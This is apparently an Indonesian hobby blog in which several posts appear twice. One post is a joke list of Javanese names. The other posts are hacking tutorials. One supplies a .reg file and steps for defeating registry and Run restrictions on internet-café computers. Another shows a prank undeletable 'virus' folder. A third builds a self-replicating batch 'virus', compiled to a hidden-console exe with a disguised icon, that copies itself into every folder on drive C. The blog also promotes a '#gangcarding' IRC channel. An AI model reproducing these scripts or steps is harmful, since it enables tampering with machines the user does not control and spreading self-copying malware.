Nama-nama dalam bahasa Jawa
02.46

Nama-nama dalam bahasa jawa beserta maknanya

Nama-nama yang boleh dipakai :
Agar pandai bikin kue = Paiman
Agar jadi kuat = Suparman
Agar cepat berjalan = Walkiman
Agar jadi pedang sate = Satiman
Agar kulitnya Halus = Luxman
Agar mengetahui hal gaib = Rohman

Agar pandai melukis = Seniman
Agar jadi tukang pintu = Dorman
Agar selalu terlindungi = Amman
Agar jadi pahlawan = Sudirman
Agar selalu beruntung = Lukiman
Agar rambutnya tertata = Poniman
Agar ahlaknya baik = Iman
Agar cinta lingkungan = Taman
Agar ahli komputer = Defragman
agar ahli sejarah = Taman
Nama-nama yang tak boleh dipakai :
Agar anak menjadi nakal = Tuman
Agar anak berpenyakitan = Kuman
Agar anak jadi tidak senonoh = Saruman
Agar anak jadi jahat = Siluman
Agar selalu loncat-loncat = Pirman
Agar anak bodoh = Whatsupman
Agar tahan api = Fairman
2 comments

Registri Broke
12.08

Sering enggak pergi ke warnet lalu ketika mau mencari sesuatu di komputer warnet, eh... fasilitas find yang ada di warnet dicomot, mau gunain dos eh dimatiin trus runnya diculik... ih... kesel enggak dengan warnet kayak gini. Saya sih kesel buangeet, tapi untung aja yang jaga warnetnya sediikit cakep jadi ya... hehehe... tau sendiri lah!.

Sering enggak pergi ke warnet lalu ketika mau mencari sesuatu di komputer warnet, eh... fasilitas find yang ada di warnet dicomot, mau gunain dos eh dimatiin trus runnya diculik... ih... kesel enggak dengan warnet kayak gini. Saya sih kesel buangeet, tapi untung aja yang jaga warnetnya sediikit cakep jadi ya... hehehe... tau sendiri lah!.


Tetapi kadang-kadang setiap pergi ke warnet kayak gini kesel juga, user benar-benar di batasi dan satu kunci untuk membuka itu semua adalah REGISTRY. Lalu bagaimana jika ternyata registry warnet juga dikunci, ckkk...ckkk.... untuk itulah saya membuka wawasan anda melalui artikel ini. Tidak perlu menjadi seorang yang expert jika hanya untuk menjebol registry, diluar pakem... enggak juga tuh!


Memang sih ada tools yang digunaiin untuk mendukung aksi kita ini, tetapi hampir disetiap warnet dan disetiap komputer tools ini ada kok, cuma sebuah program text editor sederhana seperti notepad, wordpad, kalau mau Microsoft Word juga bisa. Gimana... udah enggak sabar khan buat ngacak warnet dengan 4 langkah mudah... ITS SHOW TIME!!!


Langkah pertama yaitu buka text editor kalian, lalu copy-pastekan code berikut ini ke text-editor kalian:
----------------------------[ cut here the code ]------------------------------
REGEDIT4
; awal pembuatan kode mengacak-acak registry warnet


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

; sekarang kode buat ngaktifin run
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000000

;proses selesai
----------------------------[ cut here the code ]-----------------------------


Langkah kedua save kode tersebut dengan ekstensi REG, misalnya save dengan nama m2love.reg atau terserah anda aja dech, pokoke ekstensinya harus REG


Langkah ketiga cukup klik hasil file yang telah anda simpan tadi, kemudian lanjutkan dengan langkah keempat.


Langkah terakhir reboot komputer anda, tetapi jangan gunakan telunjuk sakti anda (istillahnya Tri Amperianto). Cukup dengan menggunakan kombinasi Ctrl+Alt+Del, caranya tekan tombol yang bertulisan Ctrl, tahan... jangan dilepas, lalu tekan juga tombol Alt juga jangan dilepas selanjutnya tombol Delete. Diharapkan anda tidak jantungan ketika Windows mengeluarkan popup. Pilih explorer lalu tekan EndTask, tunggu sebentar lalu akan muncul popup lagi, selanjutnya EndTask-kan lagi.


Sekarang klik start lalu run dan ketikkan regedit. Zup... regedit yang manis terbuka dan lakukan apa yang ingin anda lakukan... saran aja, rubah aja RegisterOwner dan Organization dengan nama anda, bukan apa-apa... biasa, pingin terkenal, hehehehe... J



Lalu selanjutnya apalagi… ya selanjutnya anda bisa berkunjung ke channel kami di #gangcarding on DalNet, situs yang cukup hangat dibandingkan situs yang berlagak expert tapi kosong dan sepi, hehehehe…. (promosi) dan jangan lupa buat ngeklik nick m_beben, nicknya seorang newbie yang manis dan imut… enggak sombong !!! JJJ
1 comments

VIrus Mainan
10.46

ga bahaya
sekarang kia mo blajar cara buat virus, tapi virus yg mau kita buat ini virusnye kaga bahaya bisa di bilang "sekedar hanya virus mainan" yg mungkin bisa nakut-nakutin komptrnya temen kita.
nah___cara buatnya kita kudu masuk ke DOS Prompt dulu, trus lo masuk ke direktory : desktop

ga bahaya
sekarang kia mo blajar cara buat virus, tapi virus yg mau kita buat ini virusnye kaga bahaya bisa di bilang "sekedar hanya virus mainan" yg mungkin bisa nakut-nakutin komptrnya temen kita.
nah___cara buatnya kita kudu masuk ke DOS Prompt dulu, trus lo masuk ke direktory : desktop

C:\Windows\desktop

klo kaga ngerti caranya masuk ke direktory desktop, gini caranya :

ketik CD WINDOWS abis itu di ENTER
trus lo ketik DESKTOP trus di ENTER

klo smua itu udah di lakuin maka baris itu akan menjadi kaya' gini :

C\WINDOWS\Desktop>

abis itu lo ketik parameter yg kaya' begini :

MD 2003 VIRUS

tapi waktu ngetik ada beberapa yg menti kalian inget n' di perhatikan : diantara MD dan 2003 harus ada spasi, tapi setelah lo ketik 2003 kalian kudu tekan dan tahan tombol ALT pada keyboard, sambil neken tombol ALT, lo masukin angka 255. Pas ngetik angaka itu emang kaga kliatan trus lo lepas tombol ALT yg lo tekan tadi. Nah___apa yg terjadi? ALT+255 itu tadi jadi spasi......yg terakhir baru kita ketik VIRUS....
dengan perintah yg kaya' gitu berarti membuat karakter spasi yg tidak dapat terhapus oleh windows
pasti temen lo bingung____knp kompi-nya ada virus yg kaga bisa ilang dari desktopnya, walopun make antivirus yg paling handal virusnya tetep kaga ilang _____

klo ingin hapus folder virus itu tadi : pada dasarnya kebalikan dari cara pembuatan virus tadi. kaya gini caranya :

lo masuk ke dalam DOS Prompt trus ganti MD menjadi RMDIR
4 comments

Buat Virus Dari Command Prompt
08.52

cmd virus
Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.



Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah

cmd virus
Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.



Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).

Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.

Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .

Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.

Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d" ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.

Contoh: perintah cmd yang sudah kita buat

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.


Keterangan:
Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “
4 comments

10.18.2008

Nama-nama dalam bahasa Jawa

Nama-nama dalam bahasa jawa beserta maknanya

Nama-nama yang boleh dipakai :
Agar pandai bikin kue = Paiman
Agar jadi kuat = Suparman
Agar cepat berjalan = Walkiman
Agar jadi pedang sate = Satiman
Agar kulitnya Halus = Luxman
Agar mengetahui hal gaib = Rohman

Agar pandai melukis = Seniman
Agar jadi tukang pintu = Dorman
Agar selalu terlindungi = Amman
Agar jadi pahlawan = Sudirman
Agar selalu beruntung = Lukiman
Agar rambutnya tertata = Poniman
Agar ahlaknya baik = Iman
Agar cinta lingkungan = Taman
Agar ahli komputer = Defragman
agar ahli sejarah = Taman
Nama-nama yang tak boleh dipakai :
Agar anak menjadi nakal = Tuman
Agar anak berpenyakitan = Kuman
Agar anak jadi tidak senonoh = Saruman
Agar anak jadi jahat = Siluman
Agar selalu loncat-loncat = Pirman
Agar anak bodoh = Whatsupman
Agar tahan api = Fairman

9.22.2008

Registri Broke

Sering enggak pergi ke warnet lalu ketika mau mencari sesuatu di komputer warnet, eh... fasilitas find yang ada di warnet dicomot, mau gunain dos eh dimatiin trus runnya diculik... ih... kesel enggak dengan warnet kayak gini. Saya sih kesel buangeet, tapi untung aja yang jaga warnetnya sediikit cakep jadi ya... hehehe... tau sendiri lah!.

Sering enggak pergi ke warnet lalu ketika mau mencari sesuatu di komputer warnet, eh... fasilitas find yang ada di warnet dicomot, mau gunain dos eh dimatiin trus runnya diculik... ih... kesel enggak dengan warnet kayak gini. Saya sih kesel buangeet, tapi untung aja yang jaga warnetnya sediikit cakep jadi ya... hehehe... tau sendiri lah!.


Tetapi kadang-kadang setiap pergi ke warnet kayak gini kesel juga, user benar-benar di batasi dan satu kunci untuk membuka itu semua adalah REGISTRY. Lalu bagaimana jika ternyata registry warnet juga dikunci, ckkk...ckkk.... untuk itulah saya membuka wawasan anda melalui artikel ini. Tidak perlu menjadi seorang yang expert jika hanya untuk menjebol registry, diluar pakem... enggak juga tuh!


Memang sih ada tools yang digunaiin untuk mendukung aksi kita ini, tetapi hampir disetiap warnet dan disetiap komputer tools ini ada kok, cuma sebuah program text editor sederhana seperti notepad, wordpad, kalau mau Microsoft Word juga bisa. Gimana... udah enggak sabar khan buat ngacak warnet dengan 4 langkah mudah... ITS SHOW TIME!!!


Langkah pertama yaitu buka text editor kalian, lalu copy-pastekan code berikut ini ke text-editor kalian:
----------------------------[ cut here the code ]------------------------------
REGEDIT4
; awal pembuatan kode mengacak-acak registry warnet


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

; sekarang kode buat ngaktifin run
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000000

;proses selesai
----------------------------[ cut here the code ]-----------------------------


Langkah kedua save kode tersebut dengan ekstensi REG, misalnya save dengan nama m2love.reg atau terserah anda aja dech, pokoke ekstensinya harus REG


Langkah ketiga cukup klik hasil file yang telah anda simpan tadi, kemudian lanjutkan dengan langkah keempat.


Langkah terakhir reboot komputer anda, tetapi jangan gunakan telunjuk sakti anda (istillahnya Tri Amperianto). Cukup dengan menggunakan kombinasi Ctrl+Alt+Del, caranya tekan tombol yang bertulisan Ctrl, tahan... jangan dilepas, lalu tekan juga tombol Alt juga jangan dilepas selanjutnya tombol Delete. Diharapkan anda tidak jantungan ketika Windows mengeluarkan popup. Pilih explorer lalu tekan EndTask, tunggu sebentar lalu akan muncul popup lagi, selanjutnya EndTask-kan lagi.


Sekarang klik start lalu run dan ketikkan regedit. Zup... regedit yang manis terbuka dan lakukan apa yang ingin anda lakukan... saran aja, rubah aja RegisterOwner dan Organization dengan nama anda, bukan apa-apa... biasa, pingin terkenal, hehehehe... J



Lalu selanjutnya apalagi… ya selanjutnya anda bisa berkunjung ke channel kami di #gangcarding on DalNet, situs yang cukup hangat dibandingkan situs yang berlagak expert tapi kosong dan sepi, hehehehe…. (promosi) dan jangan lupa buat ngeklik nick m_beben, nicknya seorang newbie yang manis dan imut… enggak sombong !!! JJJ

VIrus Mainan

ga bahaya
sekarang kia mo blajar cara buat virus, tapi virus yg mau kita buat ini virusnye kaga bahaya bisa di bilang "sekedar hanya virus mainan" yg mungkin bisa nakut-nakutin komptrnya temen kita.
nah___cara buatnya kita kudu masuk ke DOS Prompt dulu, trus lo masuk ke direktory : desktop

ga bahaya
sekarang kia mo blajar cara buat virus, tapi virus yg mau kita buat ini virusnye kaga bahaya bisa di bilang "sekedar hanya virus mainan" yg mungkin bisa nakut-nakutin komptrnya temen kita.
nah___cara buatnya kita kudu masuk ke DOS Prompt dulu, trus lo masuk ke direktory : desktop

C:\Windows\desktop

klo kaga ngerti caranya masuk ke direktory desktop, gini caranya :

ketik CD WINDOWS abis itu di ENTER
trus lo ketik DESKTOP trus di ENTER

klo smua itu udah di lakuin maka baris itu akan menjadi kaya' gini :

C\WINDOWS\Desktop>

abis itu lo ketik parameter yg kaya' begini :

MD 2003 VIRUS

tapi waktu ngetik ada beberapa yg menti kalian inget n' di perhatikan : diantara MD dan 2003 harus ada spasi, tapi setelah lo ketik 2003 kalian kudu tekan dan tahan tombol ALT pada keyboard, sambil neken tombol ALT, lo masukin angka 255. Pas ngetik angaka itu emang kaga kliatan trus lo lepas tombol ALT yg lo tekan tadi. Nah___apa yg terjadi? ALT+255 itu tadi jadi spasi......yg terakhir baru kita ketik VIRUS....
dengan perintah yg kaya' gitu berarti membuat karakter spasi yg tidak dapat terhapus oleh windows
pasti temen lo bingung____knp kompi-nya ada virus yg kaga bisa ilang dari desktopnya, walopun make antivirus yg paling handal virusnya tetep kaga ilang _____

klo ingin hapus folder virus itu tadi : pada dasarnya kebalikan dari cara pembuatan virus tadi. kaya gini caranya :

lo masuk ke dalam DOS Prompt trus ganti MD menjadi RMDIR

Buat Virus Dari Command Prompt

cmd virus
Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.



Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah

cmd virus
Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.



Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).

Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.

Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .

Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.

Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d" ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.

Contoh: perintah cmd yang sudah kita buat

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.


Keterangan:
Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “